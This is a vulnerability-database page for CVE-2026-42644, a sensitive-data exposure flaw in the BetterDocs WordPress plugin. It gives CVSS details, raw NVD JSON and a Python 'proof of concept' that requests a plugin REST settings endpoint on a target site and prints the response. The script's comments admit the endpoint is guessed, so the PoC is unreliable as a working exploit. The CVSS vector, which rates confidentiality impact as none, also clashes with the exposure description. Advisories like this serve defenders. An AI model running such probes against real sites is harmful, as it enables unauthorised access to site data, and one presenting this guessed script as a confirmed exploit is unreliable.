Security Vulnerability Report
中文
CVE-2026-42644 CVSS 5.3 MEDIUM

CVE-2026-42644

Published: 2026-04-29 12:16:20
Last Modified: 2026-04-29 21:15:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPDeveloper BetterDocs betterdocs allows Retrieve Embedded Sensitive Data.This issue affects BetterDocs: from n/a through <= 4.3.10.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BetterDocs <= 4.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-42644 # This script demonstrates unauthorized data retrieval. import requests def exploit(target_url): # Example vulnerable endpoint structure # Actual endpoint may vary based on plugin analysis endpoint = "/wp-json/betterdocs/v1/settings" url = f"{target_url}{endpoint}" try: response = requests.get(url, timeout=10) if response.status_code == 200: print("[+] Potential data exposure detected:") print(response.text) else: print("[-] Target may not be vulnerable or endpoint changed.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "http://example.com" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42644", "sourceIdentifier": "[email protected]", "published": "2026-04-29T12:16:19.660", "lastModified": "2026-04-29T21:15:41.667", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPDeveloper BetterDocs betterdocs allows Retrieve Embedded Sensitive Data.This issue affects BetterDocs: from n/a through <= 4.3.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/betterdocs/vulnerability/wordpress-betterdocs-plugin-4-3-10-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}